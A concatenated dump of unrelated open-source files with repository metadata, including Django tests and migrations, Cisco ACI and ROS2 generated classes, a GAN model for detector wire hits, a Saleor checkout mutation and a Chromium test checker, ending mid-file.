cf57d9388cb7e3d352c181533f5217e8ac7d4f9a
|
95d73f1daebb98fe6707b999c9763f3b84d418a4
|
/cms/tests/mail.py
|
1b5281d7451060ae56a54f9cbb7b5364631a6269
|
[] |
no_license
|
leotop/django_ukrhim
|
8e01e284076878c7691986d5e8d056795d2bb900
|
e5a60a79f441ae732350e518f9b71e2724dc010a
|
refs/heads/master
| 2021-01-22T15:51:27.617651
| 2015-01-23T11:00:37
| 2015-01-23T11:00:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
# -*- coding: utf-8 -*-
from cms.api import create_page_user
from cms.test_utils.testcases import CMSTestCase
from cms.utils.mail import mail_page_user_change
from django.core import mail
from django.contrib.auth.models import User
class MailTestCase(CMSTestCase):
def setUp(self):
mail.outbox = [] # reset outbox
def test_mail_page_user_change(self):
user = User.objects.create_superuser("username", "username@django-cms.org", "username")
user = create_page_user(user, user, grant_all=True)
mail_page_user_change(user)
self.assertEqual(len(mail.outbox), 1)
|
[
"root@ip-172-31-19-251.us-west-2.compute.internal"
] |
root@ip-172-31-19-251.us-west-2.compute.internal
|
060ffffdae42855cbce9c3ae529ae8e62c711b23
|
8b187f3d60446b39a8f2ba976688ed493798fc64
|
/portal/migrations/0007_note.py
|
755564f8c5a2e3459cdfe33a6edeb0a0548dbaf1
|
[] |
no_license
|
JackSnowdon/JobHunter
|
4eb8c5bd2e5cf7c97ca5b29f697e8f95d98a5bb3
|
a2c87a6a7b14fd5231b6d99502a638ea702015a4
|
refs/heads/master
| 2022-12-19T07:27:39.354155
| 2020-10-02T17:32:00
| 2020-10-02T17:32:00
| 297,356,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
# Generated by Django 3.1.1 on 2020-09-25 15:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_job_last_updated'),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='noted', to='portal.job')),
],
),
]
|
[
"jacksnowdondrums@gmail.com"
] |
jacksnowdondrums@gmail.com
|
d932f0e7d08cd74e5251f86ce83becb224158a88
|
fdf0b68373e003bd9f4f65e1194e3e79d7e18f4c
|
/day2/class_property.py
|
d8071ea3cfd35a66da48ab8039b7eb7fe7b53d08
|
[] |
no_license
|
artheadsweden/python_advanced_nov_17
|
79b721077da3ba3bb630fde53832071d4e71c3ae
|
20f9d99ba4b996414b36fb0efe7244895b3fd34b
|
refs/heads/master
| 2021-03-24T11:08:43.733521
| 2017-11-22T23:32:23
| 2017-11-22T23:32:23
| 111,556,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
class P:
def __init__(self, x):
self.x = x
@property
def x(self):
return self.__x
@x.setter
def x(self, x):
if x < 0:
self.__x = 0
elif x > 1000:
self.__x = 1000
else:
self.__x = x
def main():
p = P(5000)
print(p.x)
p.x = 100000
print(p.x)
if __name__ == '__main__':
main()
|
[
"joakim@arthead.se"
] |
joakim@arthead.se
|
037b23778dce32e14f051a0ac32f92024cf4db53
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/rtflt/rule.py
|
a30362b62695f20e291ad7aa5994ee5f6c75ad0d
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381
| 2020-01-20T09:18:28
| 2020-01-20T09:18:28
| 235,065,676
| 0
| 0
| null | 2023-05-01T21:19:14
| 2020-01-20T09:36:37
|
Python
|
UTF-8
|
Python
| false
| false
| 4,052
|
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class Rule(Mo):
meta = ClassMeta("cobra.model.rtflt.Rule")
meta.isAbstract = True
meta.moClassName = "rtfltRule"
meta.moClassName = "rtfltRule"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Rule"
meta.writeAccessMask = 0x401002001
meta.readAccessMask = 0x401002001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.pol.Instr")
meta.superClasses.add("cobra.model.nw.FltRule")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.concreteSubClasses.add("cobra.model.rtpfx.Rule")
meta.concreteSubClasses.add("cobra.model.rtregcom.Rule")
meta.concreteSubClasses.add("cobra.model.rtmap.Rule")
meta.concreteSubClasses.add("cobra.model.rtextcom.Rule")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5581, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 3682, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"rrishike@cisco.com"
] |
rrishike@cisco.com
|
5eedc1be3759f58a0165ca8beeea10d2d67d05cc
|
4bab98acf65c4625a8b3c757327a8a386f90dd32
|
/ros2-windows/Lib/site-packages/geometry_msgs/msg/_quaternion.py
|
012d2c21882f9d81a43e5720d9d1c8ee58681265
|
[] |
no_license
|
maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP
|
e2afb08b8d7b3ac075e071e063229f76b25f883a
|
8ed707edb72692698f270317113eb215b57ae9f9
|
refs/heads/master
| 2023-01-15T06:00:22.844468
| 2020-11-25T04:16:15
| 2020-11-25T04:16:15
| 289,108,482
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,369
|
py
|
# generated from rosidl_generator_py/resource/_idl.py.em
# with input from geometry_msgs:msg\Quaternion.idl
# generated code does not contain a copyright notice
# Import statements for member types
import rosidl_parser.definition # noqa: E402, I100
class Metaclass_Quaternion(type):
"""Metaclass of message 'Quaternion'."""
_CREATE_ROS_MESSAGE = None
_CONVERT_FROM_PY = None
_CONVERT_TO_PY = None
_DESTROY_ROS_MESSAGE = None
_TYPE_SUPPORT = None
__constants = {
}
@classmethod
def __import_type_support__(cls):
try:
from rosidl_generator_py import import_type_support
module = import_type_support('geometry_msgs')
except ImportError:
import logging
import traceback
logger = logging.getLogger(
'geometry_msgs.msg.Quaternion')
logger.debug(
'Failed to import needed modules for type support:\n' +
traceback.format_exc())
else:
cls._CREATE_ROS_MESSAGE = module.create_ros_message_msg__msg__quaternion
cls._CONVERT_FROM_PY = module.convert_from_py_msg__msg__quaternion
cls._CONVERT_TO_PY = module.convert_to_py_msg__msg__quaternion
cls._TYPE_SUPPORT = module.type_support_msg__msg__quaternion
cls._DESTROY_ROS_MESSAGE = module.destroy_ros_message_msg__msg__quaternion
@classmethod
def __prepare__(cls, name, bases, **kwargs):
# list constant names here so that they appear in the help text of
# the message class under "Data and other attributes defined here:"
# as well as populate each message instance
return {
'X__DEFAULT': 0.0,
'Y__DEFAULT': 0.0,
'Z__DEFAULT': 0.0,
'W__DEFAULT': 1.0,
}
@property
def X__DEFAULT(cls):
"""Return default value for message field 'x'."""
return 0.0
@property
def Y__DEFAULT(cls):
"""Return default value for message field 'y'."""
return 0.0
@property
def Z__DEFAULT(cls):
"""Return default value for message field 'z'."""
return 0.0
@property
def W__DEFAULT(cls):
"""Return default value for message field 'w'."""
return 1.0
class Quaternion(metaclass=Metaclass_Quaternion):
"""Message class 'Quaternion'."""
__slots__ = [
'_x',
'_y',
'_z',
'_w',
]
_fields_and_field_types = {
'x': 'double',
'y': 'double',
'z': 'double',
'w': 'double',
}
SLOT_TYPES = (
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
)
def __init__(self, **kwargs):
assert all('_' + key in self.__slots__ for key in kwargs.keys()), \
'Invalid arguments passed to constructor: %s' % \
', '.join(sorted(k for k in kwargs.keys() if '_' + k not in self.__slots__))
self.x = kwargs.get(
'x', Quaternion.X__DEFAULT)
self.y = kwargs.get(
'y', Quaternion.Y__DEFAULT)
self.z = kwargs.get(
'z', Quaternion.Z__DEFAULT)
self.w = kwargs.get(
'w', Quaternion.W__DEFAULT)
def __repr__(self):
typename = self.__class__.__module__.split('.')
typename.pop()
typename.append(self.__class__.__name__)
args = []
for s, t in zip(self.__slots__, self.SLOT_TYPES):
field = getattr(self, s)
fieldstr = repr(field)
# We use Python array type for fields that can be directly stored
# in them, and "normal" sequences for everything else. If it is
# a type that we store in an array, strip off the 'array' portion.
if (
isinstance(t, rosidl_parser.definition.AbstractSequence) and
isinstance(t.value_type, rosidl_parser.definition.BasicType) and
t.value_type.typename in ['float', 'double', 'int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64']
):
if len(field) == 0:
fieldstr = '[]'
else:
assert fieldstr.startswith('array(')
prefix = "array('X', "
suffix = ')'
fieldstr = fieldstr[len(prefix):-len(suffix)]
args.append(s[1:] + '=' + fieldstr)
return '%s(%s)' % ('.'.join(typename), ', '.join(args))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if self.x != other.x:
return False
if self.y != other.y:
return False
if self.z != other.z:
return False
if self.w != other.w:
return False
return True
@classmethod
def get_fields_and_field_types(cls):
from copy import copy
return copy(cls._fields_and_field_types)
    @property
    def x(self):
        """Message field 'x'."""
        return self._x

    @x.setter
    def x(self, value):
        # Type validation only runs in debug mode; it is stripped under -O.
        if __debug__:
            assert \
                isinstance(value, float), \
                "The 'x' field must be of type 'float'"
        self._x = value

    @property
    def y(self):
        """Message field 'y'."""
        return self._y

    @y.setter
    def y(self, value):
        if __debug__:
            assert \
                isinstance(value, float), \
                "The 'y' field must be of type 'float'"
        self._y = value

    @property
    def z(self):
        """Message field 'z'."""
        return self._z

    @z.setter
    def z(self, value):
        if __debug__:
            assert \
                isinstance(value, float), \
                "The 'z' field must be of type 'float'"
        self._z = value

    @property
    def w(self):
        """Message field 'w'."""
        return self._w

    @w.setter
    def w(self, value):
        if __debug__:
            assert \
                isinstance(value, float), \
                "The 'w' field must be of type 'float'"
        self._w = value
|
[
"aidencfarrar@gmail.com"
] |
aidencfarrar@gmail.com
|
2befce3106817fc0f55d94063b2ac6ba3355720f
|
d8edd97f8f8dea3f9f02da6c40d331682bb43113
|
/networks371.py
|
69994056fe8fa748472cd893751fdb81bc410798
|
[] |
no_license
|
mdubouch/noise-gan
|
bdd5b2fff3aff70d5f464150443d51c2192eeafd
|
639859ec4a2aa809d17eb6998a5a7d217559888a
|
refs/heads/master
| 2023-07-15T09:37:57.631656
| 2021-08-27T11:02:45
| 2021-08-27T11:02:45
| 284,072,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,082
|
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
__version__ = 205
# Number of wires in the CDC
n_wires = 3606
# Number of continuous features (E, t, dca)
n_features = 3
class Gen(nn.Module):
    """GAN generator: maps a latent vector to a sequence of CDC hits.

    Each time step gets a (straight-through Gumbel-softmax) one-hot wire
    choice plus n_features continuous values conditioned on the chosen
    wire's (x, y) position.
    """

    def __init__(self, ngf, latent_dims, seq_len, encoded_dim):
        super().__init__()

        self.ngf = ngf
        self.seq_len = seq_len

        self.version = __version__

        # Input: (B, latent_dims, 1)
        self.act = nn.ReLU()

        # Project the latent vector to a (1024, seq_len/64) feature map.
        self.lin0 = nn.Linear(latent_dims, seq_len//64*1024, bias=True)

        class GBlock(nn.Module):
            """Upsampling block: doubles sequence length, changes channels.

            Residual-style: a nearest-neighbour upsample of a 1x1 projection
            is added to a learned transposed-conv path.
            """
            def __init__(self, in_channels, out_channels):
                super().__init__()
                self.convp = nn.ConvTranspose1d(in_channels, out_channels, 1, 1, 0)
                self.convu = nn.ConvTranspose1d(in_channels, out_channels, 4, 2, 1)
                self.conv1 = nn.ConvTranspose1d(out_channels, out_channels, 3, 1, 1)
                self.bnu = nn.BatchNorm1d(out_channels)
                self.bn1 = nn.BatchNorm1d(out_channels)
                self.act = nn.ReLU()
            def forward(self, x):
                y0 = F.interpolate(self.convp(x), scale_factor=2, mode='nearest')
                y = self.act(self.bnu(self.convu(x)))
                y = self.act(y0 + self.bn1(self.conv1(y)))
                return y

        # Six doubling blocks: seq_len/64 -> seq_len, 1024 -> 256 channels.
        self.gb1 = GBlock(1024, 768)
        self.gb2 = GBlock(768, 512)
        self.gb3 = GBlock(512, 384)
        self.gb4 = GBlock(384, 256)
        self.gb5 = GBlock(256, 256)
        self.gb6 = GBlock(256, 256)

        # Wire head: per-step logits over all n_wires wires.
        self.convw1 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
        self.bnw1 = nn.InstanceNorm1d(256)
        self.convw2 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
        self.bnw2 = nn.InstanceNorm1d(256)
        self.convw3 = nn.ConvTranspose1d(256, n_wires, 3, 1, 1)
        #self.bnp0 = nn.BatchNorm1d(n_wires)

        # Feature head: fuses the shared feature map with the wire position
        # (convp1 takes 2 input channels, i.e. the x/y coordinates).
        self.convwp = nn.ConvTranspose1d(256, 64, 1, 1, 0)
        self.convp1 = nn.ConvTranspose1d(2, 64, 3, 1, 1)
        self.bnp1 = nn.BatchNorm1d(64)
        self.convp2 = nn.ConvTranspose1d(64, 32, 3, 1, 1)
        self.bnp2 = nn.BatchNorm1d(32)
        self.convp3 = nn.ConvTranspose1d(32, n_features, 1, 1, 0)

        self.out = nn.Tanh()

    def forward(self, z, wire_to_xy):
        # z: random point in latent space
        x = self.act(self.lin0(z).view(-1, 1024, self.seq_len // 64))

        x = self.gb1(x)
        x = self.gb2(x)
        x = self.gb3(x)
        x = self.gb4(x)
        x = self.gb5(x)
        x = self.gb6(x)

        w = self.bnw1(self.act(self.convw1(x)))
        w = self.bnw2(self.act(self.convw2(w)))
        w = self.convw3(w)

        # Differentiable (straight-through) one-hot wire selection.
        wg = F.gumbel_softmax(w, dim=1, hard=True, tau=2/3)
        # Look up each selected wire's coordinates. wire_to_xy must be
        # (2, n_wires) since convp1 expects 2 channels; result is (B, 2, L).
        xy = torch.tensordot(wg, wire_to_xy, dims=[[1],[1]]).permute(0,2,1)

        p = self.act(self.bnp1(self.convwp(x) + self.convp1(xy)))
        p = self.act(self.bnp2(self.convp2(p)))
        p = self.convp3(p)

        # (B, n_features + 2, L): tanh-squashed features concatenated with raw
        # xy, plus the one-hot wire tensor for downstream losses.
        return torch.cat([self.out(p), xy], dim=1), wg
class Disc(nn.Module):
    """GAN critic over generated hit sequences.

    The output layer is nn.Identity (unbounded scalar), i.e. a
    Wasserstein-style critic score rather than a probability.
    """
    def __init__(self, ndf, seq_len, encoded_dim):
        super().__init__()

        self.version = __version__

        # (B, n_features, 256)
        self.act = nn.LeakyReLU(0.2)

        class DBlock(nn.Module):
            """Stride-2 downsampling conv block.

            NOTE(review): defined but never instantiated below — dead code
            kept from an earlier architecture? Confirm before removing.
            """
            def __init__(self, in_channels, out_channels):
                super().__init__()
                self.convd = nn.Conv1d(in_channels, out_channels, 4, 2, 1)
                self.act = nn.LeakyReLU(0.2)
            def forward(self, x):
                y = self.act(self.convd(x))
                return y

        # All kernel-size-1 convolutions: effectively a per-timestep MLP.
        # conv0 takes 2 channels, so the wire part fed in must be 2-channel
        # (presumably encoded_dim == 2 — confirm against caller).
        self.conv0 = nn.Conv1d(2, 64, 1, 1, 0)
        self.conv1 = nn.Conv1d(64, 128, 1, 1, 0)
        self.conv2 = nn.Conv1d(128, 256, 1, 1, 0)
        self.conv3 = nn.Conv1d(256, 256, 1, 1, 0)
        self.conv4 = nn.Conv1d(256, 256, 1, 1, 0)

        #self.lin0 = nn.Linear(256 * seq_len // 1, 1, bias=True)
        self.convf = nn.Conv1d(256, 1, 1, 1, 0)

        self.out = nn.Identity()

    def forward(self, x_):
        # x_ is concatenated tensor of p_ and w_, shape (batch, features+n_wires, seq_len)
        # p_ shape is (batch, features, seq_len),
        # w_ is AE-encoded wire (batch, encoded_dim, seq_len)
        seq_len = x_.shape[2]
        x = x_

        #dist = ((xy - nn.ConstantPad1d((1, 0), 0.0)(xy[:,:,:-1]))**2).sum(dim=1).unsqueeze(1)

        p = x[:,:n_features]
        w = x[:,n_features:]
        # NOTE(review): only `w` is scored below; the continuous features `p`
        # are split off but never used — confirm this is intentional.
        #x = torch.cat([p, w], dim=1)

        x = self.act(self.conv0(w))
        x = self.act(self.conv1(x))
        x = self.act(self.conv2(x))
        x = self.act(self.conv3(x))
        x = self.act(self.conv4(x))

        #x = self.lin0(x.flatten(1,2))
        # Per-timestep score reduced to a single scalar by mean over time.
        x = self.convf(x)
        x = x.mean(2)

        return self.out(x)#.squeeze(1)
class VAE(nn.Module):
    """Wire-index autoencoder.

    NOTE(review): despite the name, this module performs no sampling and has
    no KL term — it is a plain deterministic autoencoder mapping an n_wires
    vector down to encoded_dim (tanh-bounded) and back to n_wires logits.
    """
    def __init__(self, encoded_dim):
        super().__init__()
        class Enc(nn.Module):
            """Encoder: n_wires -> hidden -> encoded_dim, tanh-bounded output."""
            def __init__(self, hidden_size):
                super().__init__()
                self.act = nn.LeakyReLU(0.2)
                self.lin1 = nn.Linear(n_wires, hidden_size)
                self.lin2 = nn.Linear(hidden_size, encoded_dim)
                self.out = nn.Tanh()
            def forward(self, x):
                x = self.act(self.lin1(x))
                return self.out(self.lin2(x))
        class Dec(nn.Module):
            """Decoder: encoded_dim -> hidden -> n_wires (raw logits)."""
            def __init__(self, hidden_size):
                super().__init__()
                self.act = nn.ReLU()
                self.lin1 = nn.Linear(encoded_dim, hidden_size)
                self.lin2 = nn.Linear(hidden_size, n_wires)
            def forward(self, x):
                x = self.act(self.lin1(x))
                return self.lin2(x)
        self.enc_net = Enc(512)
        self.dec_net = Dec(512)

    def enc(self, x):
        # (B, C, L) input: move channels last for the Linear layers, then back.
        return self.enc_net(x.permute(0, 2, 1)).permute(0,2,1)

    def dec(self, x):
        return self.dec_net(x.permute(0, 2, 1)).permute(0,2,1)

    def forward(self, x):
        # NOTE(review): unlike enc()/dec(), forward() applies no permute —
        # it expects channels-last input directly. Confirm callers agree.
        y = self.dec_net(self.enc_net(x))
        return y
def get_n_params(model):
    """Return the total number of scalar parameters in ``model``.

    Uses ``Tensor.numel()`` instead of the original ``reshape(-1).shape[0]``,
    which avoided nothing and allocated a flattened view per parameter just
    to read its length.
    """
    return sum(p.numel() for p in model.parameters())
|
[
"m.dubouchet18@imperial.ac.uk"
] |
m.dubouchet18@imperial.ac.uk
|
c79fdf679e8dbf8e013d21dbb90d7bd6b3a07be2
|
84c4474a88a59da1e72d86b33b5326003f578271
|
/saleor/graphql/checkout/mutations/checkout_line_delete.py
|
68358da32752ad166cc6b8b7cdce9fa3ba1035cd
|
[
"BSD-3-Clause"
] |
permissive
|
vineetb/saleor
|
052bd416d067699db774f06453d942cb36c5a4b7
|
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
|
refs/heads/main
| 2023-07-20T02:01:28.338748
| 2023-07-17T06:05:36
| 2023-07-17T06:05:36
| 309,911,573
| 0
| 0
|
NOASSERTION
| 2020-11-04T06:32:55
| 2020-11-04T06:32:55
| null |
UTF-8
|
Python
| false
| false
| 2,754
|
py
|
import graphene
from ....checkout.fetch import fetch_checkout_info, fetch_checkout_lines
from ....checkout.utils import invalidate_checkout_prices
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.descriptions import ADDED_IN_34, DEPRECATED_IN_3X_INPUT
from ...core.doc_category import DOC_CATEGORY_CHECKOUT
from ...core.mutations import BaseMutation
from ...core.scalars import UUID
from ...core.types import CheckoutError
from ...core.utils import WebhookEventInfo
from ...plugins.dataloaders import get_plugin_manager_promise
from ..types import Checkout, CheckoutLine
from .utils import get_checkout, update_checkout_shipping_method_if_invalid
class CheckoutLineDelete(BaseMutation):
    """Mutation that removes one line from a checkout and recalculates it."""

    checkout = graphene.Field(Checkout, description="An updated checkout.")

    class Arguments:
        # `id` is the current identifier; `token` and `checkout_id` are
        # deprecated aliases kept for backward compatibility.
        id = graphene.ID(
            description="The checkout's ID." + ADDED_IN_34,
            required=False,
        )
        token = UUID(
            description=f"Checkout token.{DEPRECATED_IN_3X_INPUT} Use `id` instead.",
            required=False,
        )
        checkout_id = graphene.ID(
            required=False,
            description=(
                f"The ID of the checkout. {DEPRECATED_IN_3X_INPUT} Use `id` instead."
            ),
        )
        line_id = graphene.ID(description="ID of the checkout line to delete.")

    class Meta:
        description = "Deletes a CheckoutLine."
        doc_category = DOC_CATEGORY_CHECKOUT
        error_type_class = CheckoutError
        error_type_field = "checkout_errors"
        webhook_events_info = [
            WebhookEventInfo(
                type=WebhookEventAsyncType.CHECKOUT_UPDATED,
                description="A checkout was updated.",
            )
        ]

    @classmethod
    def perform_mutation(  # type: ignore[override]
        cls,
        _root,
        info: ResolveInfo,
        /,
        *,
        checkout_id=None,
        id=None,
        line_id,
        token=None,
    ):
        # Resolve the checkout from whichever identifier the client supplied.
        checkout = get_checkout(cls, info, checkout_id=checkout_id, token=token, id=id)

        line = cls.get_node_or_error(
            info, line_id, only_type=CheckoutLine, field="line_id"
        )

        # Delete only when the line actually belongs to this checkout.
        # NOTE(review): when it does not, the code below still recalculates
        # prices and fires CHECKOUT_UPDATED — confirm that is intentional.
        if line and line in checkout.lines.all():
            line.delete()

        manager = get_plugin_manager_promise(info.context).get()
        lines, _ = fetch_checkout_lines(checkout)
        checkout_info = fetch_checkout_info(checkout, lines, manager)
        # The previously chosen shipping method may no longer be valid.
        update_checkout_shipping_method_if_invalid(checkout_info, lines)
        # Mark prices stale and persist the checkout (save=True).
        invalidate_checkout_prices(checkout_info, lines, manager, save=True)
        cls.call_event(manager.checkout_updated, checkout)

        return CheckoutLineDelete(checkout=checkout)
|
[
"noreply@github.com"
] |
vineetb.noreply@github.com
|
d4077d7a3d2d6d62fed0c16b5ce02065c265119b
|
ecd25c36474ecf404a32f2f0096b5a6898e4c396
|
/python_stack/django/django_fullstack/semi_restful_tvshows/semi_restful_tvshows_app/migrations/0001_initial.py
|
68344c74cee04d8e0afc825cf43c38bae81458fc
|
[] |
no_license
|
matthew-le/Coding_Dojo_Bootcamp
|
cd7b4aa8e231db372da05a0a5444114b07fbfabf
|
6d433d5305d2d8f4ea485206895d8f84bedeb59d
|
refs/heads/main
| 2023-06-13T23:05:23.827556
| 2021-07-23T23:56:35
| 2021-07-23T23:56:35
| 388,947,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 650
|
py
|
# Generated by Django 2.2 on 2021-07-11 20:46
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Show`` table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Show',
            fields=[
                # Auto-increment primary key Django adds implicitly.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=255)),
                ('network', models.CharField(max_length=255)),
                ('release_date', models.DateTimeField()),
                ('desc', models.TextField()),
            ],
        ),
    ]
|
[
"you@example.com"
] |
you@example.com
|
b8749e25c58da9a903feb5edc84c2d6ed8ebda67
|
04b1803adb6653ecb7cb827c4f4aa616afacf629
|
/third_party/blink/web_tests/external/wpt/bluetooth/generate_test.py
|
881f7dbcb73af73b18b447f5cea142f53ba2fd36
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
Samsung/Castanets
|
240d9338e097b75b3f669604315b06f7cf129d64
|
4896f732fc747dfdcfcbac3d442f2d2d42df264a
|
refs/heads/castanets_76_dev
| 2023-08-31T09:01:04.744346
| 2021-07-30T04:56:25
| 2021-08-11T05:45:21
| 125,484,161
| 58
| 49
|
BSD-3-Clause
| 2022-10-16T19:31:26
| 2018-03-16T08:07:37
| null |
UTF-8
|
Python
| false
| false
| 1,927
|
py
|
#!/usr/bin/python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# TODO(50903): Delete the file in LayoutTests/bluetooth after all the tests have
# been migrated to this directory.
"""Test that the set of gen-* files is the same as the generated files."""
import errno
import fnmatch
import logging
import os
import sys

import generate
UPDATE_TIP = 'To update the generated tests, run:\n' \
'$ python third_party/WebKit/LayoutTests/bluetooth/generate.py'
def main():
    """Verify every generated gen-* test matches its template and that no
    stale generated files remain on disk.

    Returns 0 on success and -1 on any mismatch (consumed by sys.exit).
    """
    logging.basicConfig(level=logging.INFO)
    logging.info(UPDATE_TIP)
    generated_files = set()
    # Tests data in gen-* files is the same as the data generated.
    for generated_test in generate.GetGeneratedTests():
        generated_files.add(generated_test.path)
        try:
            with open(generated_test.path, 'r') as f:
                data = f.read().decode('utf-8')
            if data != generated_test.data:
                logging.error('%s does not match template', generated_test.path)
                return -1
        except IOError as e:  # was `except IOError, e` — Python-2-only syntax
            if e.errno == errno.ENOENT:  # was a magic `2`
                logging.error('Missing generated test:\n%s\nFor template:\n%s',
                              generated_test.path,
                              generated_test.template)
                return -1
            # Other I/O failures (e.g. permissions) were silently ignored
            # before; surface them instead of masking the problem.
            raise

    # Tests that there are no obsolete generated files.
    previous_generated_files = set()
    current_path = os.path.dirname(os.path.realpath(__file__))
    for root, _, filenames in os.walk(current_path):
        for filename in fnmatch.filter(filenames, 'gen-*.https.html'):
            previous_generated_files.add(os.path.join(root, filename))
    if previous_generated_files != generated_files:
        logging.error('There are extra generated tests. Please remove them.')
        for test_path in previous_generated_files - generated_files:
            logging.error('%s', test_path)
        return -1
    # Explicit success status (previously an implicit None -> exit code 0).
    return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"sunny.nam@samsung.com"
] |
sunny.nam@samsung.com
|
f4d3f9c392925ef0d5946029ba07286699ed8e90
|
ed30d9b54ad58d2c134b465a3cb4008426aa6a72
|
/Transpile/transform_expression.py
|
48c255faed874ce20875362dc466e6685e7c4963
|
[] |
no_license
|
CaspianA1/S2CPP
|
b0a026356887f9e0590518db7f242cc8d97530fc
|
808c426c2784018efd507b207702494ac85beef1
|
refs/heads/master
| 2022-12-07T06:50:41.560949
| 2020-09-06T19:56:00
| 2020-09-06T19:56:00
| 287,172,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,510
|
py
|
# transform_expression.py
common_ends = {"+": "add", "-": "sub", "*": "mul", "/": "div"}
def function_is_present(function, scheme_expr):
    """Return True if `function` appears anywhere in the nested expression.

    BUG FIX: the original recursed with swapped/wrong arguments
    (`function_is_present(argument, scheme_expr)`), re-scanning the same
    expression with the sub-list as the needle, and returned the recursion
    result unconditionally, skipping any remaining siblings. It also fell
    off the end returning None; now returns an explicit False.
    """
    for argument in scheme_expr:
        if isinstance(argument, list):
            # Descend into the sub-expression, but keep scanning siblings
